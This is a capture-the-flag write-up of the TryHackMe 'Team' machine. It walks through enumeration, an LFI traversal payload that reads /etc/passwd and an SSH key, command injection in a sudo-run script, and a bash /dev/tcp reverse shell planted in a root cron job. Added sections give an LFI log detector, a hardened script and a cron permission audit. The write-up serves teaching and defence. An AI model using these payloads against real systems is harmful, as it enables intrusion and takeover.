Team — TryHackMe


This is the write-up for the beginner-friendly boot2root machine from TryHackMe named Team. This room is available here: https://tryhackme.com/room/teamcw
The task is simple: get both the user and root flag. So, as always, let's begin the enumeration of the box with NMAP.
Enumeration
NMAP
# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.167.14
┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap -sS -Pn -T4 -p- 10.10.167.14
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-05 15:14 EST
Nmap scan report for 10.10.167.14
Host is up (0.021s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 108.33 seconds
# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p21,22,80 10.10.167.14
┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap -O -A -Pn -T4 -p21,22,80 10.10.167.14
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-05 15:26 EST
Nmap scan report for 10.10.167.14
Host is up (0.052s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 79:5f:11:6a:85:c2:08:24:30:6c:d4:88:74:1b:79:4d (RSA)
| 256 af:7e:3f:7e:b4:86:58:83:f1:f6:a2:54:a6:9b:ba:ad (ECDSA)
|_ 256 26:25:b0:7b:dc:3f:b2:94:37:12:5d:cd:06:98:c7:9f (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works! If you see this add 'te...
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (91%), Crestron XPanel control system (89%), HP P2000 G3 NAS device (86%), ASUS RT-N56U WAP (Linux 3.4) (86%), Linux 3.1 (86%), Linux 3.16 (86%), Linux 3.2 (86%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (86%), Linux 5.4 (85%), Linux 2.6.32 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 62.32 ms 10.8.0.1
2 61.12 ms 10.10.167.14
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.40 seconds
So we have 3 ports open. Port 21 is running FTP with vsftpd 3.0.3. A quick searchsploit on this version does not show any known vulnerabilities, and anonymous login is not available.
Port 22 has OpenSSH 7.6p1 running. This is also a relatively new version, but user enumeration might be possible. We will keep that in mind and carry on.
Let's explore Port 80. Putting the IP address into the browser gives us the default Apache2 "It works" page. Did some enumeration here but did not find anything.
Entry in /etc/hosts
After adding an entry to /etc/hosts for the target's IP address along with a name, we get a new web page at http://team.thm:
10.10.96.20 team.thm

Let's check if we can brute force directories on this web page using ffuf.
FFUF Scan
┌──(kali㉿kali)-[/tmp]
└─$ ffuf -u http://team.thm/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c

ffuf v1.2.1
________________________________________________

 :: Method : GET
 :: URL : http://team.thm/FUZZ
 :: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Extensions : .html .php .txt
 :: Follow redirects : false
 :: Calibration : false
 :: Timeout : 10
 :: Threads : 40
 :: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________

scripts [Status: 301, Size: 306, Words: 20, Lines: 10]
index.html [Status: 200, Size: 2966, Words: 140, Lines: 90]
images [Status: 301, Size: 305, Words: 20, Lines: 10]
assets [Status: 301, Size: 305, Words: 20, Lines: 10]
robots.txt [Status: 200, Size: 5, Words: 1, Lines: 2]
[Status: 200, Size: 2966, Words: 140, Lines: 90]
.html [Status: 403, Size: 273, Words: 20, Lines: 10]
.php [Status: 403, Size: 273, Words: 20, Lines: 10]
server-status [Status: 403, Size: 273, Words: 20, Lines: 10]
:: Progress: [882184/882184] :: Job [1/1] :: 2181 req/sec :: Duration: [0:14:39] :: Errors: 0 ::
Nothing much here apart from robots.txt. Let's check it out:

There was no directory named "dale"; maybe it is a username. Let's keep it in mind and keep enumerating. The hint mentions a "dev" site and talks about LFI. Update the /etc/hosts file with the following:
10.10.96.20 dev.team.thm team.thm
Replace the IP address with the one you got and browse to http://dev.team.thm

Click the placeholder link:

Tried some LFI payloads here, and this one gave a positive result:
http://dev.team.thm/script.php?page=./../../../etc/passwd

Ah, we see the user dale; maybe we can access his home directory:

Yes we can, and this gives us our user flag.
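From the defender's side, the request above (a page parameter carrying ../ sequences and /etc/passwd) is a very recognisable signature in the Apache access log. The script below is an added example, not part of the original write-up: it runs those traversal signatures over a handful of constructed access-log lines (the IPs, timestamps and user agents are made up for the example) and reports which source addresses produced them. The only real path it assumes is /var/log/apache2/access.log, the default Apache log location on Ubuntu.

```shell
#!/bin/sh
# Added example (not from the write-up): a small detection pass over Apache
# access-log lines for the LFI / path-traversal pattern used in the room.
# The log lines below are constructed samples, not traffic from the target.

SAMPLE_LOG='10.0.0.5 - - [05/Mar/2021:15:40:01 -0500] "GET /script.php?page=teamshare.php HTTP/1.1" 200 1324 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Mar/2021:15:41:12 -0500] "GET /script.php?page=./../../../etc/passwd HTTP/1.1" 200 2103 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Mar/2021:15:41:40 -0500] "GET /script.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 2103 "-" "curl/7.74.0"
10.0.0.7 - - [05/Mar/2021:15:43:00 -0500] "GET /images/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.3 - - [05/Mar/2021:15:44:21 -0500] "GET /script.php?page=..%2F..%2F..%2Fetc%2Fgroup HTTP/1.1" 200 812 "-" "python-requests/2.25"'

# Traversal indicators: literal "../", its percent-encoded forms, and direct
# references to /etc/passwd. Matched case-insensitively so %2F and %2f both hit.
LFI_PATTERN='\.\./|\.\.%2f|%2e%2e%2f|%2e%2e/|/etc/passwd'

# Print every log line that matches the pattern (empty output when none do).
lfi_hits() {
  printf '%s\n' "$1" | grep -iE "$LFI_PATTERN" || true
}

# Number of matching lines; prints 0 rather than failing when nothing matches.
lfi_hit_count() {
  count=$(printf '%s\n' "$1" | grep -ciE "$LFI_PATTERN" || true)
  printf '%s\n' "$count"
}

# Source IPs of matching lines, most active first, as "<count> <ip>" per line.
lfi_hit_ips() {
  lfi_hits "$1" | awk '{ print $1 }' | sort | uniq -c | sort -rn | awk '{ print $1, $2 }'
}

# Traversal attempts that returned a 2xx status (field 9 in the combined log
# format): the ones where the server actually served something, so triage first.
lfi_successful_hits() {
  lfi_hits "$1" | awk '$9 ~ /^2/'
}

# Run against a real log: sh lfi_detect.sh /var/log/apache2/access.log
# With no argument it reports on the constructed sample above.
if [ -n "${1:-}" ] && [ -r "$1" ]; then
  lfi_hit_ips "$(cat "$1")"
else
  lfi_hit_ips "$SAMPLE_LOG"
fi
```

Two of the five sample lines are benign and three are traversal attempts, so the script reports 10.0.0.9 twice and 10.0.0.3 once. The 2xx filter is the useful part in practice: on the room's dev site every attempt returned 200, which is exactly the signal that the include is unrestricted.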
LFI to RCE
Now that we know we have an LFI vulnerability, tried checking for Apache log poisoning and SSH log poisoning, but we did not have access to those logs. So enumerated the files we can access using a few word lists:
https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad/LFI
LFI-gracefulsecurity-linux.txt from SecLists proved to be fruitful. Captured one request in BurpSuite and sent it to Intruder:

And used the same file as the payload list and got an interesting result:

We can read the private key for user "dale". Let's use this to log in to the target after removing all '#' characters from the key:
chmod 600 id_rsa
ssh -i id_rsa dale@10.10.210.177

Privilege Escalation
Transfer the Linux Smart Enumeration (LSE) script to the target and run it:

So user "dale" can run /home/gyles/admin_checks as user "gyles". Let's check out what is in this file:
dale@TEAM:~$ cat /home/gyles/admin_checks
#!/bin/bash

printf "Reading stats.\n"
sleep 1
printf "Reading stats..\n"
sleep 1
read -p "Enter name of person backing up the data: " name
echo $name >> /var/stats/stats.txt
read -p "Enter 'date' to timestamp the file: " error
printf "The Date is "
$error 2>/dev/null

date_save=$(date "+%F-%H-%M")
cp /var/stats/stats.txt /var/stats/stats-$date_save.bak

printf "Stats have been backed up\n"
From this script we can see that we can inject commands while running it as user "gyles", because the user's input is not sanitized: whatever is typed at the second prompt is stored in $error and then executed as a command.

Upgrade the shell by running:
/usr/bin/script -qc /bin/bash /dev/null
Ran LSE again, but didn't get anything interesting. Ran pspy to check if anything interesting is running:
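For comparison with admin_checks above, here is a hardened rewrite as an added example; it is not the room's script and was not written by the room author. It keeps the same behaviour (record a name, print the date, back up the stats file) but never executes user input: the name is written with printf '%s' so it is stored verbatim, and the second prompt only accepts the literal word "date". The stats directory is a parameter (defaulting to /var/stats, the path the original uses) so the functions can be exercised against a temporary directory.

```shell
#!/bin/sh
# Added example (not the room's script): a hardened admin_checks that keeps the
# original prompts but never runs what the user typed.

# Append the operator's name to the stats file as literal text. printf '%s'
# performs no expansion, so input such as '$(id)' or '; bash' is stored as-is
# (the original used an unquoted "echo $name", which also word-splits and globs).
append_stats_name() {
  stats_file="$1"
  name="$2"
  printf '%s\n' "$name" >> "$stats_file"
}

# The original ran the answer directly ("$error 2>/dev/null"). Here the only
# accepted answer is the word "date"; anything else is refused and the function
# returns 1 so the caller can abort the backup.
print_timestamp() {
  case "$1" in
    date) date ;;
    *) printf 'Refusing to run "%s": only "date" is accepted\n' "$1" >&2; return 1 ;;
  esac
}

# Copy stats.txt to a timestamped .bak next to it (same naming as the original).
backup_stats() {
  stats_file="$1"
  date_save=$(date "+%F-%H-%M")
  cp "$stats_file" "${stats_file%.txt}-$date_save.bak"
}

# Interactive flow matching the original prompts; "read -r" keeps backslashes.
main() {
  stats_dir="${1:-/var/stats}"
  printf 'Reading stats.\n'; sleep 1
  printf 'Reading stats..\n'; sleep 1
  printf 'Enter name of person backing up the data: '
  read -r name
  append_stats_name "$stats_dir/stats.txt" "$name"
  printf "Enter 'date' to timestamp the file: "
  read -r answer
  printf 'The Date is '
  print_timestamp "$answer" || exit 1
  backup_stats "$stats_dir/stats.txt"
  printf 'Stats have been backed up\n'
}

# Only run interactively when invoked as: ./admin_checks --run [stats_dir]
if [ "${1:-}" = "--run" ]; then
  main "${2:-}"
fi
```

The sudo rule that lets dale run this as gyles is unchanged; what changes is that the script no longer hands gyles's privileges to whoever is typing. If the script really needs a flexible second step, an allow-list (as in the case statement) is the pattern to extend, not a lookup of the raw string as a command.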

From the above output, /usr/local/bin/main_backup.sh is running as root (UID=0), and user "gyles" can edit the script because he belongs to the "admin" group:

Let's put a reverse shell into this script and also start a netcat listener:
bash -i >& /dev/tcp/10.8.98.192/9999 0>&1

And after a minute or so:

That's it. We are root. Thanks for reading.
P.S. User dale is a member of the "lxd" group. There is a possible way to get root if a user is a member of the "lxd" group. I haven't tried that yet, but will look at it later.
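The root cause of the final step is a script that cron runs as root but that a non-root group can modify. The audit script below is an added example, not part of the write-up: it checks a given path for the conditions that make this possible (not owned by root, group- or world-writable, or sitting in a directory that is), and with no arguments runs a self-check against a constructed temporary file that mimics the room's group-writable main_backup.sh. The path /usr/local/bin/main_backup.sh in the usage comment is the one from the pspy output above.

```shell
#!/bin/sh
# Added example (not from the write-up): audit scripts that cron runs as root
# for the weakness used in the room, a file non-root users can modify.
# Usage: sh cron_audit.sh /usr/local/bin/main_backup.sh [more paths...]
# With no arguments it runs a self-check against a constructed temp file.

# Print one finding per line for the given path, or "OK" when clean.
# Findings: NOT-ROOT-OWNED, WRITABLE-BY-GROUP, WRITABLE-BY-OTHER,
#           DIR-WRITABLE-BY-GROUP, DIR-WRITABLE-BY-OTHER.
# The parent directory matters too: a writable directory lets the file be
# replaced even when the file itself is locked down.
audit_cron_script() {
  path="$1"
  if [ ! -e "$path" ]; then
    printf 'MISSING\n'
    return 0
  fi
  findings=""
  # "ls -ld" gives a 10-character mode string: type, user rwx, group rwx, other rwx.
  # Character 6 is the group write bit and character 9 the other write bit.
  perm=$(ls -ld "$path" | cut -c1-10)
  owner=$(ls -ld "$path" | awk '{ print $3 }')
  [ "$owner" = "root" ] || findings="$findings NOT-ROOT-OWNED"
  [ "$(printf '%s' "$perm" | cut -c6)" = "w" ] && findings="$findings WRITABLE-BY-GROUP"
  [ "$(printf '%s' "$perm" | cut -c9)" = "w" ] && findings="$findings WRITABLE-BY-OTHER"
  dir=$(dirname "$path")
  dperm=$(ls -ld "$dir" | cut -c1-10)
  [ "$(printf '%s' "$dperm" | cut -c6)" = "w" ] && findings="$findings DIR-WRITABLE-BY-GROUP"
  [ "$(printf '%s' "$dperm" | cut -c9)" = "w" ] && findings="$findings DIR-WRITABLE-BY-OTHER"
  if [ -z "$findings" ]; then
    printf 'OK\n'
  else
    # $findings is deliberately unquoted so each finding lands on its own line.
    printf '%s\n' $findings
  fi
}

if [ $# -gt 0 ]; then
  for p in "$@"; do
    printf '%s: ' "$p"
    audit_cron_script "$p" | tr '\n' ' '
    printf '\n'
  done
else
  # Self-check on a constructed file: group-writable, like the room's script.
  tmpd=$(mktemp -d)
  chmod 755 "$tmpd"
  printf '#!/bin/bash\necho backup\n' > "$tmpd/main_backup.sh"
  chmod 775 "$tmpd/main_backup.sh"
  printf 'self-check on %s: ' "$tmpd/main_backup.sh"
  audit_cron_script "$tmpd/main_backup.sh" | tr '\n' ' '
  printf '\n'
  rm -rf "$tmpd"
fi
```

On the room's box the expected finding for /usr/local/bin/main_backup.sh is WRITABLE-BY-GROUP, since that is what lets a member of "admin" edit it. The fix is the usual one: root-owned, mode 755 or tighter, in a root-owned directory, and the same check applied to every path referenced from /etc/crontab, /etc/cron.d and root's own crontab.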